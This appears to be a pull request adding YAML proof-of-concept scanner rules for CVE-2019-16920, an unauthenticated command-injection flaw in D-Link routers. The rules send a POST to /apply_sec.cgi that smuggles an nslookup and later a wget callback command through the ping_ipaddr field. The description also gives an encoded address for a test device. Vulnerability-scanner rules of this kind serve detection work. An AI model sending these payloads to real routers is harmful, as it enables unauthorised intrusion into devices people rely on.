### PR TITLE
添加多款D-Link路由器未授权RCE漏洞POC

### DIFF
--- a/pocs/dlink-cve-2019-16920-rce.yml
+++ b/pocs/dlink-cve-2019-16920-rce.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-dlink-rce-cve-2019-16920
+name: poc-yaml-dlink-cve-2019-16920-rce
 rules:
   - method: POST
     path: /apply_sec.cgi
@@ -13,3 +13,4 @@ detail:
   author: JingLing(https://hackfun.org/)
   links:
     - https://www.anquanke.com/post/id/187923
+    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

--- a/pocs/dlink-rce-cve-2019-16920.yml
+++ b/pocs/dlink-rce-cve-2019-16920.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-dlink-rce-cve-2019-16920
+rules:
+  - method: POST
+    path: /apply_sec.cgi
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0anslookup%20{{reverse_domain}}%20{{reverse_ip}}
+    follow_redirects: true
+    expression: |
+      status == 200 && waitReverse(5)
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://www.anquanke.com/post/id/187923

--- a/pocs/dlink-rce-cve-2019-16920.yml
+++ b/pocs/dlink-rce-cve-2019-16920.yml
@@ -5,10 +5,10 @@ rules:
     headers:
       Content-Type: application/x-www-form-urlencoded
     body: >-
-      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0anslookup%20{{reverse_domain}}%20{{reverse_ip}}
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverse_url}}
     follow_redirects: true
     expression: |
-      status == 200 && waitReverse(5)
+      status == 200 && waitReverse(10)
 detail:
   author: JingLing(https://hackfun.org/)
   links:


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
检测多款D-Link路由器未授权RCE漏洞
## 测试环境
aHR0cDovLzEzMy4xMzAuMTY0LjI1MTo4MDgw
## 备注
漏洞分析：https://www.anquanke.com/post/id/187923
测试截图：
![image](https://user-images.githubusercontent.com/24275308/66595450-90b33f00-ebcd-11e9-8ff1-c3dc5f9dde61.png)
